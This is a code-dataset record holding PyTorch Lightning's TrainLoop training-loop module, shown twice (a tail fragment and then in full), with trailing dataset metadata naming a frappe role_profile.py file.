optimization # make sure to zero grad. self.zero_grad_handler(batch_idx, optimizer, opt_idx) continue batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # todo: Properly aggregate grad_norm accros opt_idx and split_idx grad_norm_dic = self._cur_grad_norm_dict self._cur_grad_norm_dict = None # hook + clear gradients self.zero_grad_handler(batch_idx, optimizer, opt_idx) # update running loss + reset accumulated loss self.update_running_loss() result = AttributeDict( signal=0, grad_norm_dic=grad_norm_dic, training_step_output_for_epoch_end=batch_outputs, ) return result @contextmanager def block_ddp_sync_behaviour(self): if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel): yield self.trainer.model.no_sync() else: yield def _process_closure_result( self, batch_outputs: list, opt_idx: int ) -> list: opt_closure_result = self._curr_step_result if opt_closure_result is not None: # cache metrics self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result) # track hiddens self.trainer.hiddens = self.process_hiddens(opt_closure_result) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(opt_closure_result.loss) # track all the outputs across all steps batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0 batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end) if self.automatic_optimization: # track total loss for logging (avoid mem leaks) self.accumulated_loss.append(opt_closure_result.loss) self._curr_step_result = None return batch_outputs def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens): """ wrap the forward step in a closure so second order methods work """ # lightning module hook result = self.training_step(split_batch, batch_idx, opt_idx, hiddens) self._curr_step_result = result if result is None: self.warning_cache.warn("training_step returned None if it was on purpose, ignore this warning...") return None if self.trainer.train_loop.automatic_optimization: # backward pass with self.trainer.profiler.profile("model_backward"): self.backward(result, optimizer, opt_idx) # hook - call this hook only # when gradients have finished to accumulate if not self.should_accumulate(): self.on_after_backward(result.training_step_output, batch_idx, result.loss) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(result.loss) return result def backward(self, result, optimizer, opt_idx, *args, **kwargs): self.trainer.dev_debugger.track_event("backward_call") # backward can be called manually in the training loop if isinstance(result, torch.Tensor): self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs) else: result.closure_loss = self.trainer.accelerator_backend.backward( result.closure_loss, optimizer, opt_idx, *args, **kwargs ) if not self.should_accumulate(): # track gradients self.track_and_norm_grad(optimizer=optimizer) def update_train_loop_lr_schedulers(self, monitor_metrics=None): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() if num_accumulated_batches_reached or num_training_batches_reached: # update lr self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics) def run_on_epoch_end_hook(self, epoch_output): self.trainer.call_hook('on_epoch_end') self.trainer.call_hook('on_train_epoch_end', epoch_output) self.trainer.logger_connector.on_train_epoch_end() def increment_accumulated_grad_global_step(self): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() # progress global step according to grads progress if num_accumulated_batches_reached or num_training_batches_reached: self.trainer.global_step += 1 def _accumulated_batches_reached(self): return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0 def _num_training_batches_reached(self): return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches def should_accumulate(self): # checks if backward or backward + optimizer step (via closure) accumulation_done = self._accumulated_batches_reached() is_final_batch = self._num_training_batches_reached() return not (accumulation_done or is_final_batch) def should_check_val_fx(self, batch_idx, is_last_batch): # decide if we should run validation is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0 is_val_check_epoch = (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch == 0 can_check_val = self.trainer.enable_validation and is_val_check_epoch should_check_val = is_val_check_batch or self.trainer.should_stop is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf") should_check_val = can_check_val and (should_check_val or is_last_batch_for_infinite_dataset) return should_check_val def build_train_args(self, batch, batch_idx, opt_idx, hiddens): # enable not needing to add opt_idx to training_step args = [batch, batch_idx] if len(self.trainer.optimizers) > 1: if self.trainer.has_arg("training_step", "optimizer_idx"): args.append(opt_idx) else: num_opts = len(self.trainer.optimizers) raise ValueError( f"Your LightningModule defines {num_opts} optimizers but " f'training_step is missing the "optimizer_idx" argument.' ) # pass hiddens if using tbptt if self.trainer.truncated_bptt_steps is not None: args.append(hiddens) return args def save_loggers_on_train_batch_end(self): # when loggers should save to disk should_flush_logs = self.trainer.logger_connector.should_flush_logs if should_flush_logs or self.trainer.fast_dev_run: if self.trainer.is_global_zero and self.trainer.logger is not None: self.trainer.logger.save() def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator): """ Figure out what needs to be tracked/logged at the end of the epoch """ # the training step outputs a list per optimizer. The list contains the outputs at each time step # when no TBPTT is used, then the list has 1 item per batch # when TBPTT IS used, then the list has n items (1 per time step) epoch_end_outputs = [] for optimizer_idx_outputs in all_train_step_outputs: # extract one representative sample from each time step (1 if no tbptt) and 0th optimizer if len(optimizer_idx_outputs) == 0: continue sample_output = optimizer_idx_outputs[-1] # pull out callback info if available (ie: Results object) if isinstance(sample_output, dict) and "early_stop_on" in sample_output: early_stopping_accumulator.accumulate(sample_output["early_stop_on"]) if isinstance(sample_output, dict) and "checkpoint_on" in sample_output: checkpoint_accumulator.accumulate(sample_output["checkpoint_on"]) # decide if we need to reduce at the end of the epoch automatically auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end # only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result: epoch_end_outputs.append(optimizer_idx_outputs) return epoch_end_outputs def prepare_optimizers(self): # in manual optimization we loop over all optimizers at once optimizers = self.get_optimizers_iterable() if not self.automatic_optimization: optimizers = [optimizers[0]] return optimizers def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer): # set split_idx to trainer for tracking self.trainer.split_idx = split_idx # make sure only the gradients of the current optimizer's parameters are calculated # in the training step to prevent dangling gradients in multiple-optimizer setup. if self.automatic_optimization and len(self.trainer.optimizers) > 1: model = self.trainer.get_model() model.toggle_optimizer(optimizer, opt_idx) # use to track metrics internally self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch) def update_running_loss(self): accumulated_loss = self.accumulated_loss.mean() if accumulated_loss is not None: # calculate running loss for display self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches) # reset for next set of accumulated grads self.accumulated_loss.reset() def zero_grad_handler(self, batch_idx, optimizer, opt_idx): if self.automatic_optimization: # hook self.on_before_zero_grad(optimizer) optimizers = enumerate([optimizer]) else: optimizers = self.get_optimizers_iterable() for idx, optimizer in optimizers: self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
41.995798
121
0.654402
from contextlib import contextmanager from copy import copy, deepcopy import numpy as np import torch import torch.distributed as torch_distrib from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.core.lightning import LightningModule from pytorch_lightning.core.memory import ModelSummary from pytorch_lightning.core.step_result import EvalResult, Result from pytorch_lightning.trainer.states import TrainerState from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator from pytorch_lightning.utilities import parsing, AMPType from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn from pytorch_lightning.utilities.exceptions import MisconfigurationException from pytorch_lightning.utilities.memory import recursive_detach from pytorch_lightning.utilities.model_utils import is_overridden from pytorch_lightning.utilities.parsing import AttributeDict from pytorch_lightning.utilities.warning_utils import WarningCache class TrainLoop: def __init__(self, trainer): self.trainer = trainer self.early_stopping_accumulator = None self.checkpoint_accumulator = None self.accumulated_loss = None self.warning_cache = WarningCache() self._teardown_already_run = False self.running_loss = TensorRunningAccum(window_length=20) self.automatic_optimization = True self._curr_step_result = None self._cur_grad_norm_dict = None def on_trainer_init( self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization ): self.trainer.global_step = 0 self.trainer.current_epoch = 0 self.trainer.interrupted = False self.trainer.should_stop = False self.trainer._state = TrainerState.INITIALIZING self.trainer.total_batch_idx = 0 self.trainer.batch_idx = 0 self.trainer.num_training_batches = 0 self.trainer.train_dataloader = None self.automatic_optimization = automatic_optimization self.trainer.max_epochs = max_epochs self.trainer.min_epochs = min_epochs self.trainer.max_steps = max_steps self.trainer.min_steps = min_steps if num_sanity_val_steps == -1: self.trainer.num_sanity_val_steps = float("inf") else: self.trainer.num_sanity_val_steps = num_sanity_val_steps @property def num_optimizers(self): num_optimizers = len(self.get_optimizers_iterable()) return num_optimizers def should_skip_training(self): if self.trainer.current_epoch >= self.trainer.max_epochs: return True if self.trainer.limit_train_batches == 0: return True return False def on_train_start(self): if self.trainer.on_gpu and self.trainer.root_gpu is not None: with torch.cuda.device(f"cuda:{self.trainer.root_gpu}"): torch.cuda.empty_cache() self.trainer.call_hook("on_train_start") def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule): self.trainer.model_connector.copy_trainer_model_properties(model) if hasattr(model, "hparams"): parsing.clean_namespace(model.hparams) self.trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule) self.trainer.config_validator.verify_loop_configurations(model) def setup_training(self, model: LightningModule): ref_model = model if self.trainer.data_parallel: ref_model = model.module self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank self.trainer.accelerator_backend.dist.device = ref_model.device ref_model.trainer = self.trainer self.trainer.model_connector.copy_trainer_model_properties(ref_model) if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu: self.trainer.scaler = torch.cuda.amp.GradScaler() if self.trainer.logger is not None: self.trainer.logger.log_hyperparams(ref_model.hparams_initial) self.trainer.logger.log_graph(ref_model) self.trainer.logger.save() self.trainer.accelerator_backend.barrier("setup_training") self.trainer.slurm_connector.register_slurm_signal_handlers() self.trainer.on_pretrain_routine_start(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_start"): ref_model.on_pretrain_routine_start() if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing: if self.trainer.weights_summary in ModelSummary.MODES: ref_model.summarize(mode=self.trainer.weights_summary) else: raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES)) self.trainer.model = model self.trainer.checkpoint_connector.restore_weights(model) self.trainer.on_pretrain_routine_end(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_end"): ref_model.on_pretrain_routine_end() def on_train_end(self): if self._teardown_already_run: return self._teardown_already_run = True self.trainer.global_step -= 1 self.check_checkpoint_callback(should_save=True, is_last=True) self.trainer.global_step += 1 self.trainer.call_hook("on_train_end") if self.trainer.logger is not None: self.trainer.logger.finalize("success") if self.trainer.global_rank == 0: self.trainer.profiler.describe() self.trainer.accelerator_backend.on_train_end() if self.trainer.on_gpu: model = self.trainer.get_model() model.cpu() torch.cuda.empty_cache() def check_checkpoint_callback(self, should_save, is_last=False): if should_save and self.trainer.checkpoint_connector.has_trained: checkpoint_callbacks = [c for c in self.trainer.callbacks if isinstance(c, ModelCheckpoint)] if is_last and any(c.save_last for c in checkpoint_callbacks): rank_zero_info("Saving latest checkpoint...") model = self.trainer.get_model() [c.on_validation_end(self.trainer, model) for c in checkpoint_callbacks] def on_train_epoch_start(self, epoch): self.trainer.current_epoch = epoch model = self.trainer.get_model() if self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) try: self.trainer.train_dataloader.sampler.set_epoch(epoch) except Exception: pass self.trainer.accumulation_scheduler.on_epoch_start(self.trainer, self.trainer.get_model()) self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches) self.early_stopping_accumulator = Accumulator() self.checkpoint_accumulator = Accumulator() self.trainer.call_hook("on_epoch_start") self.trainer.call_hook("on_train_epoch_start") def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx): self.trainer.call_hook('on_batch_end') self.trainer.call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx) self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs) self.trainer.logger_connector.on_train_batch_end() def reset_train_val_dataloaders(self, model): if not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) if self.trainer.val_dataloaders is None and not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_val_dataloader(model) def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs): for opt_idx, opt_outputs in enumerate(epoch_end_outputs): if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result): opt_outputs = opt_outputs[0] epoch_output[opt_idx].append(opt_outputs) def get_optimizers_iterable(self): if not self.trainer.optimizer_frequencies: # call training_step once per optimizer return list(enumerate(self.trainer.optimizers)) optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies) optimizers_loop_length = optimizer_freq_cumsum[-1] current_place_in_loop = self.trainer.total_batch_idx % optimizers_loop_length # find optimzier index by looking for the first {item > current_place} in the cumsum list opt_idx = np.argmax(optimizer_freq_cumsum > current_place_in_loop) return [[opt_idx, self.trainer.optimizers[opt_idx]]] def on_after_backward(self, training_step_output, batch_idx, untouched_loss): is_result_obj = isinstance(training_step_output, Result) if is_result_obj: training_step_output.detach() else: training_step_output.batch_loss = training_step_output.batch_loss.detach() # insert after step hook self.trainer.call_hook("on_after_backward") # when in dev debugging track the losses self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach()) def _check_training_step_output(self, training_step_output): if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization: if training_step_output.grad_fn is None: # TODO: Find why - RuntimeError: Expected to mark a variable ready only once ... raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor") def training_step(self, split_batch, batch_idx, opt_idx, hiddens): # give the PL module a result for logging model_ref = self.trainer.get_model() with self.trainer.profiler.profile("model_forward"): args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens) # manually capture logged metrics model_ref._current_fx_name = 'training_step' training_step_output = self.trainer.accelerator_backend.training_step(args) self.trainer.logger_connector.cache_logged_metrics() self._check_training_step_output(training_step_output) training_step_output = self.trainer.call_hook("training_step_end", training_step_output) training_step_output_for_epoch_end, training_step_output = self._process_training_step_output( training_step_output, split_batch ) is_result_obj = isinstance(training_step_output, Result) if training_step_output_for_epoch_end is None: return None # enable empty loss when using manual opt closure_loss = None untouched_loss = None if self.trainer.train_loop.automatic_optimization: # accumulate loss # (if accumulate_grad_batches = 1 no effect) if is_result_obj: closure_loss = training_step_output.minimize else: closure_loss = training_step_output.batch_loss closure_loss = closure_loss / self.trainer.accumulate_grad_batches # the loss will get scaled for amp. avoid any modifications to it untouched_loss = closure_loss.detach().clone() # result result = AttributeDict( closure_loss=closure_loss, loss=untouched_loss, training_step_output=training_step_output, training_step_output_for_epoch_end=training_step_output_for_epoch_end, hiddens=training_step_output.hiddens, ) return result def _process_training_step_output(self, training_step_output, split_batch): training_step_output_for_epoch_end = training_step_output # enable validation_step return None if training_step_output_for_epoch_end is None: return None, None # ----------------------------------------- # process result return (DEPRECATE in 1.0) # ----------------------------------------- if isinstance(training_step_output, Result): training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch) return training_step_output_for_epoch_end, training_step_output # ----------------------------------------- # process hybrid (1.0) # ----------------------------------------- # no need for these checks in 1.0.0 # TODO: remove checks in 1.0.0 is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor) is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output) if is_1_0_output: return self._process_training_step_output_1_0(training_step_output, split_batch) # ----------------------------------------- # process old dict (deprecate 1.0) # ----------------------------------------- training_step_output = self.trainer.process_dict_result(training_step_output, train=True) training_step_output = AttributeDict( batch_loss=training_step_output[0], pbar_on_batch_end=training_step_output[1], log_metrics=training_step_output[2], callback_metrics=training_step_output[3], hiddens=training_step_output[4], ) # if the user decides to finally reduce things in epoch_end, save raw output without graphs if isinstance(training_step_output_for_epoch_end, torch.Tensor): training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach() else: training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end) return training_step_output_for_epoch_end, training_step_output def _process_training_step_output_1_0(self, training_step_output, split_batch): result = self.trainer.get_model()._results loss = None hiddens = None # handle dict return if isinstance(training_step_output, dict): loss = training_step_output.pop("loss", None) hiddens = training_step_output.pop("hiddens", None) result["extra"] = training_step_output # handle scalar return elif isinstance(training_step_output, torch.Tensor): loss = training_step_output result["extra"] = {} # map to results under the hood result.minimize = loss result.hiddens = hiddens # track batch for manual reduction with result result.track_batch_size(len(split_batch)) # track metrics without grads for epoch reduction training_step_output_for_epoch_end = copy(result) training_step_output_for_epoch_end.detach() if self.trainer.move_metrics_to_cpu: training_step_output_for_epoch_end.cpu() # what flows back into the system training_step_output = result return training_step_output_for_epoch_end, training_step_output def _process_result(self, training_step_output, split_batch): training_step_output.track_batch_size(len(split_batch)) m = """ TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0. Use self.log and .write from the LightningModule to log metrics and write predictions. training_step can now only return a scalar (for the loss) or a dictionary with anything you want. Option 1: return loss Option 2: return {'loss': loss, 'anything_else': ...} Option 3: return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...} """ rank_zero_warn(m) # don't allow EvalResult in the training_step if isinstance(training_step_output, EvalResult): raise MisconfigurationException( "training_step cannot return EvalResult, " "use a dict or TrainResult instead" ) training_step_output_for_epoch_end = copy(training_step_output) training_step_output_for_epoch_end.detach() return training_step_output_for_epoch_end def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure): with self.trainer.profiler.profile("optimizer_step"): self.trainer.accelerator_backend.optimizer_step( optimizer, batch_idx, opt_idx, train_step_and_backward_closure ) def on_before_zero_grad(self, optimizer): self.trainer.call_hook('on_before_zero_grad', optimizer) def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx): self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx) def track_and_norm_grad(self, optimizer): grad_norm_dic = self._track_gradient_norm() self.trainer.accelerator_backend.clip_gradients(optimizer) self._cur_grad_norm_dict = grad_norm_dic def _track_gradient_norm(self): grad_norm_dict = {} if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0: if float(self.trainer.track_grad_norm) > 0: model = self.trainer.get_model() grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm) return grad_norm_dict def process_hiddens(self, opt_closure_result): hiddens = opt_closure_result.hiddens if isinstance(opt_closure_result.training_step_output, Result): opt_closure_result.training_step_output_for_epoch_end.drop_hiddens() return hiddens def tbptt_split_batch(self, batch): splits = [batch] if self.trainer.truncated_bptt_steps is not None: model_ref = self.trainer.get_model() with self.trainer.profiler.profile("tbptt_split_batch"): splits = model_ref.tbptt_split_batch(batch, self.trainer.truncated_bptt_steps) return splits def run_training_epoch(self): model = self.trainer.get_model() train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader) epoch_output = [[] for _ in range(self.num_optimizers)] train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader) dataloader_idx = 0 should_check_val = False for batch_idx, (batch, is_last_batch) in train_dataloader: self.trainer.batch_idx = batch_idx batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx) if batch_output.signal == -1: break epoch_end_outputs = self.process_train_step_outputs( batch_output.training_step_output_for_epoch_end, self.early_stopping_accumulator, self.checkpoint_accumulator, ) self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx) self.trainer.logger_connector.log_train_step_metrics(batch_output) should_check_val = self.should_check_val_fx(batch_idx, is_last_batch) if should_check_val: self.trainer.run_evaluation(test_mode=False) self.trainer.logger_connector.set_stage("train") self.save_loggers_on_train_batch_end() monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics) self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics) self.trainer.checkpoint_connector.has_trained = True if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1: accumulation_done = self._accumulated_batches_reached() if accumulation_done: break # requested in the batches if self.trainer.should_stop: break self.trainer.total_batch_idx += 1 # stop epoch if we limited the number of training batches if (batch_idx + 1) >= self.trainer.num_training_batches: break # progress global step according to grads progress self.increment_accumulated_grad_global_step() # epoch end hook self.run_on_epoch_end_hook(epoch_output) # log epoch metrics self.trainer.logger_connector.log_train_epoch_end_metrics( epoch_output, self.checkpoint_accumulator, self.early_stopping_accumulator, self.num_optimizers ) # when no val loop is present or fast-dev-run still need to call checkpoints self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model))) # increment the global step once # progress global step according to grads progress self.increment_accumulated_grad_global_step() def run_training_batch(self, batch, batch_idx, dataloader_idx): # track grad norms grad_norm_dic = {} # bookkeeping using_results_obj = False self.trainer.hiddens = None # track all outputs across time and num of optimizers batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))] if batch is None: return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_batch_start") if response == -1: return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx) if response == -1: return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # lightning module hook splits = self.tbptt_split_batch(batch) for split_idx, split_batch in enumerate(splits): # create an iterable for optimizers and loop over them for opt_idx, optimizer in self.prepare_optimizers(): # toggle model params + set info to logger_connector self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer) if self.should_accumulate(): # For gradient accumulation # ------------------- # calculate loss (train step + train step end) # ------------------- # perform dpp sync only when performing optimizer_step with self.block_ddp_sync_behaviour(): self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens) batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # ------------------------------ # BACKWARD PASS # ------------------------------ # gradient update with accumulated gradients else: if self.automatic_optimization: def train_step_and_backward_closure(): result = self.training_step_and_backward( split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens ) return None if result is None else result.loss # optimizer step self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure) else: self._curr_step_result = self.training_step( split_batch, batch_idx, opt_idx, self.trainer.hiddens ) if self._curr_step_result is None: # user decided to skip optimization # make sure to zero grad. self.zero_grad_handler(batch_idx, optimizer, opt_idx) continue batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # todo: Properly aggregate grad_norm accros opt_idx and split_idx grad_norm_dic = self._cur_grad_norm_dict self._cur_grad_norm_dict = None # hook + clear gradients self.zero_grad_handler(batch_idx, optimizer, opt_idx) # update running loss + reset accumulated loss self.update_running_loss() result = AttributeDict( signal=0, grad_norm_dic=grad_norm_dic, training_step_output_for_epoch_end=batch_outputs, ) return result @contextmanager def block_ddp_sync_behaviour(self): if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel): yield self.trainer.model.no_sync() else: yield def _process_closure_result( self, batch_outputs: list, opt_idx: int ) -> list: opt_closure_result = self._curr_step_result if opt_closure_result is not None: # cache metrics self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result) # track hiddens self.trainer.hiddens = self.process_hiddens(opt_closure_result) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(opt_closure_result.loss) # track all the outputs across all steps batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0 batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end) if self.automatic_optimization: # track total loss for logging (avoid mem leaks) self.accumulated_loss.append(opt_closure_result.loss) self._curr_step_result = None return batch_outputs def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens): # lightning module hook result = self.training_step(split_batch, batch_idx, opt_idx, hiddens) self._curr_step_result = result if result is None: self.warning_cache.warn("training_step returned None if it was on purpose, ignore this warning...") return None if self.trainer.train_loop.automatic_optimization: # backward pass with self.trainer.profiler.profile("model_backward"): self.backward(result, optimizer, opt_idx) # hook - call this hook only # when gradients have finished to accumulate if not self.should_accumulate(): self.on_after_backward(result.training_step_output, batch_idx, result.loss) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(result.loss) return result def backward(self, result, optimizer, opt_idx, *args, **kwargs): self.trainer.dev_debugger.track_event("backward_call") # backward can be called manually in the training loop if isinstance(result, torch.Tensor): self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs) else: result.closure_loss = self.trainer.accelerator_backend.backward( result.closure_loss, optimizer, opt_idx, *args, **kwargs ) if not self.should_accumulate(): # track gradients self.track_and_norm_grad(optimizer=optimizer) def update_train_loop_lr_schedulers(self, monitor_metrics=None): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() if num_accumulated_batches_reached or num_training_batches_reached: # update lr self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics) def run_on_epoch_end_hook(self, epoch_output): self.trainer.call_hook('on_epoch_end') self.trainer.call_hook('on_train_epoch_end', epoch_output) self.trainer.logger_connector.on_train_epoch_end() def increment_accumulated_grad_global_step(self): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() # progress global step according to grads progress if num_accumulated_batches_reached or num_training_batches_reached: self.trainer.global_step += 1 def _accumulated_batches_reached(self): return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0 def _num_training_batches_reached(self): return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches def should_accumulate(self): # checks if backward or backward + optimizer step (via closure) accumulation_done = self._accumulated_batches_reached() is_final_batch = self._num_training_batches_reached() return not (accumulation_done or is_final_batch) def should_check_val_fx(self, batch_idx, is_last_batch): # decide if we should run validation is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0 is_val_check_epoch = (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch == 0 can_check_val = self.trainer.enable_validation and is_val_check_epoch should_check_val = is_val_check_batch or self.trainer.should_stop is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf") should_check_val = can_check_val and (should_check_val or is_last_batch_for_infinite_dataset) return should_check_val def build_train_args(self, batch, batch_idx, opt_idx, hiddens): # enable not needing to add opt_idx to training_step args = [batch, batch_idx] if len(self.trainer.optimizers) > 1: if self.trainer.has_arg("training_step", "optimizer_idx"): args.append(opt_idx) else: num_opts = len(self.trainer.optimizers) raise ValueError( f"Your LightningModule defines {num_opts} optimizers but " f'training_step is missing the "optimizer_idx" argument.' ) # pass hiddens if using tbptt if self.trainer.truncated_bptt_steps is not None: args.append(hiddens) return args def save_loggers_on_train_batch_end(self): # when loggers should save to disk should_flush_logs = self.trainer.logger_connector.should_flush_logs if should_flush_logs or self.trainer.fast_dev_run: if self.trainer.is_global_zero and self.trainer.logger is not None: self.trainer.logger.save() def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator): # the training step outputs a list per optimizer. The list contains the outputs at each time step # when no TBPTT is used, then the list has 1 item per batch # when TBPTT IS used, then the list has n items (1 per time step) epoch_end_outputs = [] for optimizer_idx_outputs in all_train_step_outputs: # extract one representative sample from each time step (1 if no tbptt) and 0th optimizer if len(optimizer_idx_outputs) == 0: continue sample_output = optimizer_idx_outputs[-1] # pull out callback info if available (ie: Results object) if isinstance(sample_output, dict) and "early_stop_on" in sample_output: early_stopping_accumulator.accumulate(sample_output["early_stop_on"]) if isinstance(sample_output, dict) and "checkpoint_on" in sample_output: checkpoint_accumulator.accumulate(sample_output["checkpoint_on"]) # decide if we need to reduce at the end of the epoch automatically auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end # only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result: epoch_end_outputs.append(optimizer_idx_outputs) return epoch_end_outputs def prepare_optimizers(self): # in manual optimization we loop over all optimizers at once optimizers = self.get_optimizers_iterable() if not self.automatic_optimization: optimizers = [optimizers[0]] return optimizers def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer): # set split_idx to trainer for tracking self.trainer.split_idx = split_idx # make sure only the gradients of the current optimizer's parameters are calculated if self.automatic_optimization and len(self.trainer.optimizers) > 1: model = self.trainer.get_model() model.toggle_optimizer(optimizer, opt_idx) self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch) def update_running_loss(self): accumulated_loss = self.accumulated_loss.mean() if accumulated_loss is not None: self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches) self.accumulated_loss.reset() def zero_grad_handler(self, batch_idx, optimizer, opt_idx): if self.automatic_optimization: self.on_before_zero_grad(optimizer) optimizers = enumerate([optimizer]) else: optimizers = self.get_optimizers_iterable() for idx, optimizer in optimizers: self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
true
true
f705d8375b61940c4c02bcdbae22797b6b711bb0
664
py
Python
frappe/core/doctype/role_profile/role_profile.py
erpnext-tm/frappe
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
[ "MIT" ]
null
null
null
frappe/core/doctype/role_profile/role_profile.py
erpnext-tm/frappe
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
[ "MIT" ]
null
null
null
frappe/core/doctype/role_profile/role_profile.py
erpnext-tm/frappe
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
[ "MIT" ]
null
null
null
